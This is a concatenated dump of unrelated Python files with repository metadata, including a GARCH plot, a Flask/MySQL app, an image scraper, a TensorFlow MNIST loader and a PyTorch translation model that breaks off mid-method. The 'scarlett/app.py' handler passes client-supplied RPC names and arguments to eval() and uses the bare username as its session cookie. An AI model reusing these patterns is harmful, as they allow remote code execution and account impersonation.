for i in range(1,n+n1-1):
t[i]=errors[i]*np.sqrt(alpha[0]+alpha[1]*errors[i-1]**2+beta*t[i-1]**2)
#
y=t[n1-1:-1] # drop n1 observations
plt.title('GARCH (1,1) process')
x=range(n)
plt.plot(x,y)
plt.xlabel('time')
plt.ylabel('y')
plt.savefig('SFEtimegarch_py.png')
plt.show() | [
"[email protected]"
] | |
4eaeed1619b3dcb639ee308019b90729a7124038 | bfc1b107b2ce8c664b17be7d96b93bf69aaa8665 | /lab_10_zadania/07.py | aea5b665b965041edf2d9d5e29141733e6f9acc7 | [] | no_license | bulwan/wizualizacja_danych | db16c97da765646a71a8a794030f8014022cbc19 | e305914105f42d22d42deb4e10a09b181534254f | refs/heads/main | 2023-05-01T07:16:23.954859 | 2021-05-26T11:59:18 | 2021-05-26T11:59:18 | 346,389,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 685 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plik = pd.ExcelFile('imiona.xlsx')
imiona = pd.read_excel(plik,'Arkusz1')
kobiet=imiona[(imiona.Plec=='K')]
chlopcy=imiona[(imiona.Plec=='M')]
wynik_dziewczynki = kobiet.groupby(['Rok']).sum()
wynik_chlopcy = chlopcy.groupby(['Rok']).sum()
wynik_dziewczynki=wynik_dziewczynki.reset_index()
wynik_chlopcy=wynik_chlopcy.reset_index()
plt.xticks(np.arange(2000, 2018, 1))
plt.bar(wynik_dziewczynki.Rok,wynik_dziewczynki.Liczba, label="dziewczynki", color='pink')
plt.bar(wynik_chlopcy.Rok,wynik_chlopcy.Liczba, label="chlopcy", color='blue', bottom=wynik_dziewczynki.Liczba)
plt.legend()
plt.show() | [
"[email protected]"
] | |
6bc8e6bda70fb29b075f4f3c8c40b9a6b2656fcf | 9c6e63eb1796bbf4c37d93fca941fb67b4cd4741 | /trunk/scarlett/app.py | 7f7179015d2a9cefbdbe4557f2fd080029521298 | [] | no_license | BGCX261/zizw-svn-to-git | ffc6636d8e0d91b24f124ba3d16c61af10d7441c | c8d068af7a36396ce707dc035b15330c77b02f2a | refs/heads/master | 2016-09-05T13:11:22.053860 | 2015-08-25T15:51:45 | 2015-08-25T15:51:45 | 41,585,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,466 | py |
import logging
import webob
import wsgiref.handlers
import simplejson.encoder
import simplejson.decoder
from google.appengine.ext import db
from google.appengine.api import users
from scarlett import model
from scarlett import utils
jsonEncoder = simplejson.encoder.JSONEncoder()
jsonDecoder = simplejson.decoder.JSONDecoder()
def scarlett(environ, start_response):
#
# create request & response objects
#
request = webob.Request(environ)
response = webob.Response()
#
# create session object
#
session = Session(request)
# do job
channel = session.message["channel"]
if channel == "refresh":
if session.isAdmin:
response.body = shell % ("Scarlett-Admin", "scarlett.Admin")
elif session.user:
response.body = shell % ("Scarlett", "scarlett.Main")
else:
response.body = shell % ("Login", "scarlett.Login")
elif channel == "locateservice":
fullName = str(session.message["fullName"])
service = utils.my_import(fullName)
simpleName = fullName.split('.')[-1]
response.body = generateServiceStub(service, fullName, simpleName)
response.content_type = "text/plain"
response.charset = "UTF-8"
elif channel == "rmi":
fullName = str(session.message["serviceName"])
methodName = str(session.message["methodName"])
args = session.message["args"];
argList = ""
for i in range(len(args)):
argList += "args[%s], " % i
argList = argList[:-2]
service = utils.my_import(fullName)
outMessage = {
"result": eval("service."+methodName+"(session, "+argList+")")
}
if fullName == "scarlett.admin" and methodName == "login" and outMessage["result"]:
response.set_cookie("sid", userToSid(args[0]))
response.body = jsonEncoder.encode(outMessage)
response.content_type = "text/plain"
response.charset = "UTF-8"
elif channel == "admin":
user = users.get_current_user()
if not user:
response.body = users.create_login_url("/")
logging.info("admin: do login")
else:
response.body = "/"
logging.info("admin: do normal")
else:
response.body = "unknown channel: %s" % str(channel)
#
return response(environ, start_response)
#
# Tips:
# session.message
# session.message.channel
# session.isAdmin
# session.user
# session.user.alias
#
class Session():
def __init__(self, request):
#
# setting message
#
if request.method == "GET":
self.message = {"channel":"refresh"}
else:
self.message = jsonDecoder.decode(request.body)
#
# setting isAdmin & user
#
if users.is_current_user_admin():
self.isAdmin = True
self.user = None
elif "sid" not in request.cookies:
self.isAdmin = False
self.user = None
elif not request.cookies["sid"]:
self.isAdmin = False
self.user = None
else:
self.isAdmin = False
self.user = sidToUser(request.cookies["sid"])
def sidToUser(sid):
#
# TODO: a real sid should be used
#
return model.User.get(db.Key.from_path("User", "ID_"+sid, _app="scarlett"))
def userToSid(userName):
#
# TODO: a real sid should be used
#
return userName
def generateServiceStub(service, fullName, simpleName):
methodList= filter(lambda x : x[0:1]!= "_", dir(service))
stub = "var " + simpleName + " = function(){\n"
stub += "}\n\n"
for method in methodList:
stub += simpleName + ".prototype." + method + " = function() {\n"
stub += "\treturn jsloader.doRmi('%s', '%s', arguments);\n" % (fullName, method)
stub += "};\n"
return stub
def main():
wsgiref.handlers.CGIHandler().run(scarlett)
shell = """
<html>
<head>
<title>%s</title>
<script>
var App = null;
var app = null;
function init() {
App = jsloader.resolve("%s")
app = new App(document.body);
var welcome = document.getElementById("welcome");
document.body.removeChild(welcome);
}
function destroy() {
app.destroy();
}
</script>
</head>
<body scroll="no" style="overflow: hidden; margin: 0px; padding: 0px" onload="init()" onunload="destroy()">
<span id="welcome">Loading ...</span>
</body>
<script src="js/lang/JSLoader.js"></script>
</html>
"""
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
d1b3168fa1a02ae0a1f8d21fb8cfd7e4a2da5d51 | bbdf70d28a5df9e337522ecdfcf04a470f6d2675 | /01_LED_Blink.py | 8a6e0ded30d32b0c27944a9fd0000ad9790ae8cf | [] | no_license | ankurm97/blink-py | 376c7e8eec38fe5cac5454802563966e8778b451 | 75bd31cbb0ad933a6790a7dc4fcfbe79ed6042a3 | refs/heads/master | 2022-11-14T11:52:04.585283 | 2020-07-08T07:38:21 | 2020-07-08T07:38:21 | 278,022,134 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # sudo apt-get install python3-rpi.gpio
import RPi.GPIO as GPIO
from time import sleep
GPIO.setwarnings(False) # Ignore Warnings
GPIO.setmode(GPIO.BOARD) # Use Physical Pin Numbering
GPIO.setup(8, GPIO.OUT, initial=GPIO.LOW)
while True:
GPIO.output(8, GPIO.HIGH)
sleep(1)
GPIO.output(8, GPIO.LOW)
sleep(1)
| [
"[email protected]"
] | |
ad232b4ee33908d60b0a9a445eccd44352cff4f9 | 4d4ef69dc8a0237973dde5ce0768cf21f043f717 | /Download image automatically.py | 674716ea927e334672127be0abeb83a8f0c5c51f | [] | no_license | zh-cse18/Selenium_Webdriver_Operation | b3b02adb4762e5b2c61e05d9211e3d90725fae42 | dd001057d84aae0fbaed062fea4725e0e3bea2cc | refs/heads/master | 2023-07-20T08:13:07.690387 | 2023-07-10T09:59:59 | 2023-07-10T09:59:59 | 230,744,441 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,463 | py | import os
import json
import requests # to sent GET requests
from bs4 import BeautifulSoup # to parse HTML
# user can input a topic and a number
# download first n images from google image search
GOOGLE_IMAGE = \
'https://www.google.com/search?site=&tbm=isch&source=hp&biw=1873&bih=990&'
# The User-Agent request header contains a characteristic string
# that allows the network protocol peers to identify the application type,
# operating system, and software version of the requesting software user agent.
# needed for google search
usr_agent = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive',
}
SAVE_FOLDER = 'images'
def main():
if not os.path.exists(SAVE_FOLDER):
os.mkdir(SAVE_FOLDER)
download_images()
def download_images():
# ask for user input
data = input('What are you looking for? ')
n_images = int(input('How many images do you want? '))
print('Start searching...')
# get url query string
searchurl = GOOGLE_IMAGE + 'q=' + data
print(searchurl)
# request url, without usr_agent the permission gets denied
response = requests.get(searchurl, headers=usr_agent)
html = response.text
# find all divs where class='rg_meta'
soup = BeautifulSoup(html, 'html.parser')
results = soup.findAll('div', {'class': 'rg_meta'}, limit=n_images)
# extract the link from the div tag
imagelinks = []
for re in results:
text = re.text # this is a valid json string
text_dict = json.loads(text) # deserialize json to a Python dict
link = text_dict['ou']
# image_type = text_dict['ity']
imagelinks.append(link)
print(f'found {len(imagelinks)} images')
print('Start downloading...')
for i, imagelink in enumerate(imagelinks):
# open image link and save as file
response = requests.get(imagelink)
imagename = SAVE_FOLDER + '/' + data + str(i + 1) + '.jpg'
with open(imagename, 'wb') as file:
file.write(response.content)
print('Done')
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
2e0aeb4b8cd540d392f6e5256c8fc9f78b3b1f04 | 0144353f5d129c0d95f96c717c9aee71d26ca153 | /app_mysql.py | 3e5c0f5eea15619e2f75aef0c838311ca947c354 | [] | no_license | rafat2427/IDP | 4b44239f3cb6b52d11baf47c97b49aa38ec7e5b5 | 16c02be0244cbf32e7d94363e3af40d3c447311d | refs/heads/main | 2023-02-16T17:53:11.009820 | 2021-01-20T20:04:10 | 2021-01-20T20:04:10 | 331,417,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,252 | py | from flask import Flask, render_template, url_for, request, redirect
from flask_mysqldb import MySQL
import pandas as pd
import numpy as np
import os.path
# import yaml
app = Flask(__name__)
# Configure db
# db = yaml.load(open('db.yaml'))
# app.config['MYSQL_HOST'] = db['mysql_host']
# app.config['MYSQL_USER'] = db['mysql_user']
# app.config['MYSQL_PASSWORD'] = db['mysql_password']
# app.config['MYSQL_DB'] = db['mysql_db']
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = ''
app.config['MYSQL_DB'] = 'test'
mysql = MySQL(app)
# Start coding
# @app.route('/')
# def index():
# return render_template("about.php")
#
#
# @app.route('/users')
# def users():
# cur = mysql.connection.cursor()
# resultValue = cur.execute("SELECT * FROM users")
# if resultValue > 0:
# userDetails = cur.fetchall()
# return render_template('users.html',userDetails=userDetails)
@app.route('/')
# @app.route('/', methods=['GET', 'POST'])
def index():
# if request.method == 'POST':
# # Fetch form data
# userDetails = request.form
# name = userDetails['name']
# email = userDetails['email']
# cur = mysql.connection.cursor()
# cur.execute("INSERT INTO users(name, email) VALUES(%s, %s)",(name, email))
# mysql.connection.commit()
# cur.close()
# return redirect('/users')
# return render_template('index.html')
#
# @app.route('/users')
# def users():
cur_member = mysql.connection.cursor()
cur_gp = mysql.connection.cursor()
resultValue = cur_member.execute("SELECT * FROM members")
groupValue = cur_gp.execute("SELECT * FROM gp")
if resultValue > 0 or groupValue > 0:
userDetails = cur_member.fetchall()
groupDetails = cur_gp.fetchall()
return render_template('members group.php',userDetails=userDetails, groupDetails=groupDetails)
@app.route('/show')
def show_data():
csv1 = pd.read_csv("status_1.csv")
print(csv1)
val_list = csv1.values.tolist()
c_yes=val_list.count('Yes')
c_no=val_list.count('No')
state=1
if c_no > c_yes:
state = 2
return render_template('show_status.php',val_list=val_list,c_yes=c_yes,c_no=c_no)
@app.route('/status')
def show_status():
csv1 = pd.read_csv("status_1.csv")
print(csv1)
val_list = csv1.values.tolist()
c_yes=val_list.count('Yes')
c_no=val_list.count('No')
# state=1
# if c_no > c_yes
# state = 2
state = 2
cur_state = mysql.connection.cursor()
cur_member = mysql.connection.cursor()
cur_gp = mysql.connection.cursor()
cur_state.execute("UPDATE `status` SET `sta_id` = %s WHERE `status`.`persno` = 12345 ", state)
resultValue = cur_member.execute("SELECT * FROM members")
groupValue = cur_gp.execute("SELECT * FROM status")
if resultValue > 0 or groupValue > 0:
userDetails = cur_member.fetchall()
groupDetails = cur_gp.fetchall()
return render_template('members group.php',userDetails=userDetails, groupDetails=groupDetails)
if __name__ == '__main__':
app.run(debug=True)
| [
"[email protected]"
] | |
d519581682c5b4acb68ab1878e3cda3a7b8c4ddd | 5e2655fb23e558c54695dea5c9456b5552570947 | /localdev/seed/management/commands/seed_data.py | f42ad2be00ea5d9f4f5111900de0d82b66bf4e16 | [
"BSD-3-Clause"
] | permissive | mitodl/bootcamp-ecommerce | 992cb23243462d82c75cfae6c115a27728491219 | 339c67b84b661a37ffe32580da72383d95666c5c | refs/heads/master | 2023-08-31T10:45:57.827990 | 2023-07-25T13:55:32 | 2023-07-25T13:55:32 | 82,849,185 | 6 | 3 | BSD-3-Clause | 2023-08-24T20:25:47 | 2017-02-22T20:27:24 | Python | UTF-8 | Python | false | false | 709 | py | """Management command to create or update seed data"""
from django.core.management.base import BaseCommand
from localdev.seed.api import create_seed_data
from localdev.seed.utils import get_raw_seed_data_from_file
class Command(BaseCommand):
"""Creates or updates seed data based on a raw seed data file"""
help = __doc__
def handle(self, *args, **options):
raw_seed_data = get_raw_seed_data_from_file()
results = create_seed_data(raw_seed_data)
if not results.has_results:
self.stdout.write(self.style.WARNING("No results logged."))
else:
self.stdout.write(self.style.SUCCESS("RESULTS"))
self.stdout.write(results.report)
| [
"[email protected]"
] | |
ad890fdf5086260c3c073c0dee7db830b7db3d9a | d33bd7e0c2cd91226d3dc7c3d927a52b8dbc05fd | /tiny_data/lip3x3_tiny/utils.py | a5f41725c9023fb3c1334631a8da4d29a58eb2e8 | [
"Apache-2.0"
] | permissive | gamedx/tiny_lips | 80d7963abd9b8455aedcc342562f7ff55f6c501b | c15e1d152369ea69715313f6b6802ed05eab2b65 | refs/heads/master | 2020-06-29T17:59:25.717198 | 2019-08-05T07:57:03 | 2019-08-05T07:57:03 | 200,585,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,914 | py | import os
import scipy
import numpy as np
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"]="0"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def load_mnist(batch_size, is_training=True):
path = os.path.join('data', 'mnist')
if is_training:
fd = open(os.path.join(path, 'train-images-idx3-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
trainX = loaded[16:].reshape((8400, 39, 39, 1)).astype(np.float32)
fd = open(os.path.join(path, 'train-labels-idx1-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
trainY = loaded[8:].reshape((8400)).astype(np.int32)
trX = trainX[:7800] / 255.
trY = trainY[:7800]
valX = trainX[7800:, ] / 255.
valY = trainY[7800:]
num_tr_batch = 7800 // batch_size
num_val_batch = 600 // batch_size
return trX, trY, num_tr_batch, valX, valY, num_val_batch
else:
fd = open(os.path.join(path, 't10k-images-idx3-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
teX = loaded[16:].reshape((600, 39, 39, 1)).astype(np.float)
fd = open(os.path.join(path, 't10k-labels-idx1-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
teY = loaded[8:].reshape((600)).astype(np.int32)
num_te_batch = 600 // batch_size
return teX / 255., teY, num_te_batch
def load_data(dataset, batch_size, is_training=True, one_hot=False):
if dataset == 'mnist':
return load_mnist(batch_size, is_training)
else:
raise Exception('Invalid dataset, please check the name of dataset:', dataset)
def get_batch_data(dataset, batch_size, num_threads):
if dataset == 'mnist':
trX, trY, num_tr_batch, valX, valY, num_val_batch = load_mnist(batch_size, is_training=True)
elif dataset == 'fashion-mnist':
trX, trY, num_tr_batch, valX, valY, num_val_batch = load_fashion_mnist(batch_size, is_training=True)
data_queues = tf.train.slice_input_producer([trX, trY])
X, Y = tf.train.shuffle_batch(data_queues, num_threads=num_threads,
batch_size=batch_size,
capacity=batch_size * 64,
min_after_dequeue=batch_size * 32,
allow_smaller_final_batch=False)
return(X, Y)
def save_images(imgs, size, path):
'''
Args:
imgs: [batch_size, image_height, image_width]
size: a list with tow int elements, [image_height, image_width]
path: the path to save images
'''
imgs = (imgs + 1.) / 2 # inverse_transform
return(scipy.misc.imsave(path, mergeImgs(imgs, size)))
def mergeImgs(images, size):
h, w = images.shape[1], images.shape[2]
imgs = np.zeros((h * size[0], w * size[1], 3))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
imgs[j * h:j * h + h, i * w:i * w + w, :] = image
return imgs
# For version compatibility
def reduce_sum(input_tensor, axis=None, keepdims=False):
try:
return tf.reduce_sum(input_tensor, axis=axis, keepdims=keepdims)
except:
return tf.reduce_sum(input_tensor, axis=axis, keep_dims=keepdims)
# For version compatibility
def softmax(logits, axis=None):
try:
return tf.nn.softmax(logits, axis=axis)
except:
return tf.nn.softmax(logits, dim=axis)
def get_shape(inputs, name=None):
name = "shape" if name is None else name
with tf.name_scope(name):
static_shape = inputs.get_shape().as_list()
dynamic_shape = tf.shape(inputs)
shape = []
for i, dim in enumerate(static_shape):
dim = dim if dim is not None else dynamic_shape[i]
shape.append(dim)
return(shape)
| [
"[email protected]"
] | |
c7040497fddc70804c791aa8caffd6ee49621d0d | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_2/hbbirf001/question3.py | 86f1543deb5d0d08303893c1de5d53fe0d63e38e | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import math
pi =2
denom = math.sqrt(2)
while denom != 2:
pi = pi*2/denom
denom = math.sqrt(2+denom)
print('Approximation of pi:',round(pi,3),sep=' ')
radius = eval(input('Enter the radius:\n'))
area = pi*radius**2
print('Area:', round(area,3)) | [
"[email protected]"
] | |
d09f267b12df0380d0b55ee7ff1d47fd0d49c160 | ed5b7eab164bf434e500e38a946fc902ee7eac47 | /nlp_pytorch/chapter8/main.py | 1ea8ba0c5f33c97ac1a6d2881e8883968b48c07c | [] | no_license | happybear1234/machine-learning | 54269397cb02932368dbfcebb1fdf6cb2829d9e0 | 675ff6753771e2167c2a5179b1ffe49a918e478d | refs/heads/master | 2022-02-27T21:45:50.401754 | 2019-07-15T09:21:04 | 2019-07-15T09:21:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,207 | py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main
Description :
Author : haxu
date: 2019/4/14
-------------------------------------------------
Change Activity:
2019/4/14:
-------------------------------------------------
"""
__author__ = 'haxu'
from argparse import Namespace
import json
import pandas as pd
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
from torch import nn
from torch.nn import functional as F
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch import optim
class Vocabulary(object):
def __init__(self, token_to_idx=None):
if token_to_idx is None:
token_to_idx = {}
self._token_to_idx = token_to_idx
self._idx_to_token = {idx: token
for token, idx in self._token_to_idx.items()}
def to_serializable(self):
return {'token_to_idx': self._token_to_idx}
@classmethod
def from_serializable(cls, contents):
return cls(**contents)
def add_token(self, token):
if token in self._token_to_idx:
index = self._token_to_idx[token]
else:
index = len(self._token_to_idx)
self._token_to_idx[token] = index
self._idx_to_token[index] = token
return index
def add_many(self, tokens):
return [self.add_token(token) for token in tokens]
def lookup_token(self, token):
return self._token_to_idx[token]
def lookup_index(self, index):
if index not in self._idx_to_token:
raise KeyError("the index (%d) is not in the Vocabulary" % index)
return self._idx_to_token[index]
def __str__(self):
return "<Vocabulary(size=%d)>" % len(self)
def __len__(self):
return len(self._token_to_idx)
class SequenceVocabulary(Vocabulary):
def __init__(self, token_to_idx=None, unk_token="<UNK>",
mask_token="<MASK>", begin_seq_token="<BEGIN>",
end_seq_token="<END>"):
super(SequenceVocabulary, self).__init__(token_to_idx)
self._mask_token = mask_token
self._unk_token = unk_token
self._begin_seq_token = begin_seq_token
self._end_seq_token = end_seq_token
self.mask_index = self.add_token(self._mask_token)
self.unk_index = self.add_token(self._unk_token)
self.begin_seq_index = self.add_token(self._begin_seq_token)
self.end_seq_index = self.add_token(self._end_seq_token)
def to_serializable(self):
contents = super(SequenceVocabulary, self).to_serializable()
contents.update({'unk_token': self._unk_token,
'mask_token': self._mask_token,
'begin_seq_token': self._begin_seq_token,
'end_seq_token': self._end_seq_token})
return contents
def lookup_token(self, token):
if self.unk_index >= 0:
return self._token_to_idx.get(token, self.unk_index)
else:
return self._token_to_idx[token]
class NMTVectorizer(object):
def __init__(self, source_vocab, target_vocab, max_source_length, max_target_length):
"""
Args:
source_vocab (SequenceVocabulary): maps source words to integers
target_vocab (SequenceVocabulary): maps target words to integers
max_source_length (int): the longest sequence in the source dataset
max_target_length (int): the longest sequence in the target dataset
"""
self.source_vocab = source_vocab
self.target_vocab = target_vocab
self.max_source_length = max_source_length
self.max_target_length = max_target_length
def _vectorize(self, indices, vector_length=-1, mask_index=0):
"""Vectorize the provided indices
Args:
indices (list): a list of integers that represent a sequence
vector_length (int): an argument for forcing the length of index vector
mask_index (int): the mask_index to use; almost always 0
"""
if vector_length < 0:
vector_length = len(indices)
vector = np.zeros(vector_length, dtype=np.int)
vector[:len(indices)] = indices
vector[len(indices):] = mask_index
return vector
def _get_source_indices(self, text):
"""Return the vectorized source text
Args:
text (str): the source text; tokens should be separated by spaces
Returns:
indices (list): list of integers representing the text
"""
indices = [self.source_vocab.begin_seq_index]
indices.extend(self.source_vocab.lookup_token(token) for token in text.split(" "))
indices.append(self.source_vocab.end_seq_index)
return indices
def _get_target_indices(self, text):
"""Return the vectorized source text
Args:
text (str): the source text; tokens should be separated by spaces
Returns:
a tuple: (x_indices, y_indices)
x_indices (list): list of integers representing the observations in target decoder
y_indices (list): list of integers representing predictions in target decoder
"""
indices = [self.target_vocab.lookup_token(token) for token in text.split(" ")]
x_indices = [self.target_vocab.begin_seq_index] + indices
y_indices = indices + [self.target_vocab.end_seq_index]
return x_indices, y_indices
def vectorize(self, source_text, target_text, use_dataset_max_lengths=True):
source_vector_length = -1
target_vector_length = -1
if use_dataset_max_lengths:
source_vector_length = self.max_source_length + 2 # begin end
target_vector_length = self.max_target_length + 1 # end
source_indices = self._get_source_indices(source_text)
source_vector = self._vectorize(source_indices,
vector_length=source_vector_length,
mask_index=self.source_vocab.mask_index)
target_x_indices, target_y_indices = self._get_target_indices(target_text)
target_x_vector = self._vectorize(target_x_indices,
vector_length=target_vector_length,
mask_index=self.target_vocab.mask_index)
target_y_vector = self._vectorize(target_y_indices,
vector_length=target_vector_length,
mask_index=self.target_vocab.mask_index)
return {"source_vector": source_vector,
"target_x_vector": target_x_vector,
"target_y_vector": target_y_vector,
"source_length": len(source_indices)}
@classmethod
def from_dataframe(cls, bitext_df):
source_vocab = SequenceVocabulary()
target_vocab = SequenceVocabulary()
max_source_length = 0
max_target_length = 0
for _, row in bitext_df.iterrows():
source_tokens = row["source_language"].split(" ")
if len(source_tokens) > max_source_length:
max_source_length = len(source_tokens)
for token in source_tokens:
source_vocab.add_token(token)
target_tokens = row["target_language"].split(" ")
if len(target_tokens) > max_target_length:
max_target_length = len(target_tokens)
for token in target_tokens:
target_vocab.add_token(token)
return cls(source_vocab, target_vocab, max_source_length, max_target_length)
@classmethod
def from_serializable(cls, contents):
source_vocab = SequenceVocabulary.from_serializable(contents["source_vocab"])
target_vocab = SequenceVocabulary.from_serializable(contents["target_vocab"])
return cls(source_vocab=source_vocab,
target_vocab=target_vocab,
max_source_length=contents["max_source_length"],
max_target_length=contents["max_target_length"])
def to_serializable(self):
return {"source_vocab": self.source_vocab.to_serializable(),
"target_vocab": self.target_vocab.to_serializable(),
"max_source_length": self.max_source_length,
"max_target_length": self.max_target_length}
class NMTDataset(Dataset):
def __init__(self, text_df, vectorizer):
self.text_df = text_df
self._vectorizer = vectorizer
self.train_df = self.text_df[self.text_df.split == 'train']
self.train_size = len(self.train_df)
self.val_df = self.text_df[self.text_df.split == 'val']
self.validation_size = len(self.val_df)
self.test_df = self.text_df[self.text_df.split == 'test']
self.test_size = len(self.test_df)
self._lookup_dict = {'train': (self.train_df, self.train_size),
'val': (self.val_df, self.validation_size),
'test': (self.test_df, self.test_size)}
self.set_split('train')
@classmethod
def load_dataset_and_make_vectorizer(cls, dataset_csv):
text_df = pd.read_csv(dataset_csv)
train_subset = text_df[text_df.split == 'train']
return cls(text_df, NMTVectorizer.from_dataframe(train_subset))
@classmethod
def load_dataset_and_load_vectorizer(cls, dataset_csv, vectorizer_filepath):
text_df = pd.read_csv(dataset_csv)
vectorizer = cls.load_vectorizer_only(vectorizer_filepath)
return cls(text_df, vectorizer)
@staticmethod
def load_vectorizer_only(vectorizer_filepath):
with open(vectorizer_filepath) as fp:
return NMTVectorizer.from_serializable(json.load(fp))
def save_vectorizer(self, vectorizer_filepath):
with open(vectorizer_filepath, "w") as fp:
json.dump(self._vectorizer.to_serializable(), fp)
def get_vectorizer(self):
return self._vectorizer
def set_split(self, split="train"):
self._target_split = split
self._target_df, self._target_size = self._lookup_dict[split]
def __len__(self):
return self._target_size
def __getitem__(self, index):
row = self._target_df.iloc[index]
vector_dict = self._vectorizer.vectorize(row.source_language, row.target_language)
return {"x_source": vector_dict["source_vector"],
"x_target": vector_dict["target_x_vector"],
"y_target": vector_dict["target_y_vector"],
"x_source_length": vector_dict["source_length"]}
def get_num_batches(self, batch_size):
return len(self) // batch_size
def generate_nmt_batches(dataset, batch_size, shuffle=False,
drop_last=True, device="cpu"):
"""A generator function which wraps the PyTorch DataLoader. The NMT Version """
""" 同时对长度进行排序 从大到小"""
dataloader = DataLoader(dataset=dataset, batch_size=batch_size,
shuffle=shuffle, drop_last=drop_last)
for data_dict in dataloader:
lengths = data_dict['x_source_length'].numpy()
sorted_length_indices = lengths.argsort()[::-1].tolist()
out_data_dict = {}
for name, tensor in data_dict.items():
out_data_dict[name] = data_dict[name][sorted_length_indices].to(device)
yield out_data_dict
class NMTEncoder(nn.Module):
def __init__(self, num_embeddings, embedding_size, rnn_hidden_size):
super(NMTEncoder, self).__init__()
self.source_embedding = nn.Embedding(
num_embeddings=num_embeddings,
embedding_dim=embedding_size,
padding_idx=0,
)
self.birnn = nn.GRU(
embedding_size, rnn_hidden_size, bidirectional=True, batch_first=True
)
def forward(self, x_source, x_lengths):
"""
:param x_source: (bs, 25)
:param x_lengths: (bs, )
:return:
"""
x_embeded = self.source_embedding(x_source) # (bs, 25, 64)
x_lengths = x_lengths.numpy() # (bs,)
x_packed = pack_padded_sequence(x_embeded, x_lengths, batch_first=True) # (sum(x_lengths), 64)
x_birnn_out, x_birnn_h = self.birnn(x_packed) # [(sum(x_lengths), 128*2), (2, bs, 128)]
x_birnn_h = x_birnn_h.permute(1, 0, 2) # (bs, 2, 128)
x_birnn_h = x_birnn_h.contiguous().view(x_birnn_h.size(0), -1) # (bs, 256)
x_unpacked, _ = pad_packed_sequence(x_birnn_out, batch_first=True) # (bs, ?,256)
# (bs, 10, 256)
# (bs, 256)
return x_unpacked, x_birnn_h
def verbose_attention(encoder_state_vectors, query_vector):
# (bs, max_len, 256)
# (bs, 256)
batch_size, num_vectors, vector_size = encoder_state_vectors.size()
vector_scores = torch.sum(encoder_state_vectors * query_vector.view(batch_size, 1, vector_size),
dim=2) # (bs, max_len)
vector_probabilities = F.softmax(vector_scores, dim=1) # (bs, max_len)
weighted_vectors = encoder_state_vectors * vector_probabilities.view(batch_size,
num_vectors, 1) # (bs, max_len, 256)
context_vectors = torch.sum(weighted_vectors, dim=1) # (bs, 256)
return context_vectors, vector_probabilities, vector_scores
class NMTDecoder(nn.Module):
def __init__(self, num_embeddings, embedding_size, rnn_hidden_size, bos_index):
super(NMTDecoder, self).__init__()
self._rnn_hidden_size = rnn_hidden_size
self.target_embedding = nn.Embedding(num_embeddings=num_embeddings,
embedding_dim=embedding_size,
padding_idx=0)
self.gru_cell = nn.GRUCell(embedding_size + rnn_hidden_size,
rnn_hidden_size)
self.hidden_map = nn.Linear(rnn_hidden_size, rnn_hidden_size)
self.classifier = nn.Linear(rnn_hidden_size * 2, num_embeddings)
self.bos_index = bos_index
self._sampling_temperature = 3
def _init_indices(self, batch_size):
return torch.ones(batch_size, dtype=torch.int64) * self.bos_index
def _init_context_vectors(self, batch_size):
return torch.zeros(batch_size, self._rnn_hidden_size)
def forward(self, encoder_state, initial_hidden_state, target_sequence, sample_probability=0.0):
"""
:param encoder_state: (bs, max_len, 256)
:param initial_hidden_state: (bs, 256)
:param target_sequence: (bs, 25) target
:param sample_probability:
:return:
"""
if target_sequence is None:
sample_probability = 1.
else:
target_sequence = target_sequence.permute(1, 0) # (25,bs)
h_t = self.hidden_map(initial_hidden_state) # (bs, 256)
batch_size = encoder_state.size(0) # bs
context_vectors = self._init_context_vectors(batch_size) # (bs, 256)
y_t_index = self._init_indices(batch_size) # (bs, ) [2] * bs
device = encoder_state.device
h_t = h_t.to(device)
y_t_index = y_t_index.to(device)
context_vectors = context_vectors.to(device)
output_vectors = []
self._cached_p_attn = []
self._cached_ht = []
self._cached_decoder_state = encoder_state.cpu().detach().numpy() # (bs ,10, 256)
output_sequence_size = target_sequence.size(0) # 25
for i in range(output_sequence_size):
use_sample = np.random.random() < sample_probability
if not use_sample:
y_t_index = target_sequence[i]
y_input_vector = self.target_embedding(y_t_index) # (bs, 64)
rnn_input = torch.cat([y_input_vector, context_vectors], dim=1) # (bs, 64 + 256)
h_t = self.gru_cell(rnn_input, h_t) # (bs, 256)
self._cached_ht.append(h_t.cpu().data.numpy())
# (bs, max_len, 256)
# (bs, 256)
# 输出
# (bs ,256)
# (bs, max_len)
context_vectors, p_attn, _ = verbose_attention(
encoder_state_vectors=encoder_state,
query_vector=h_t,
)
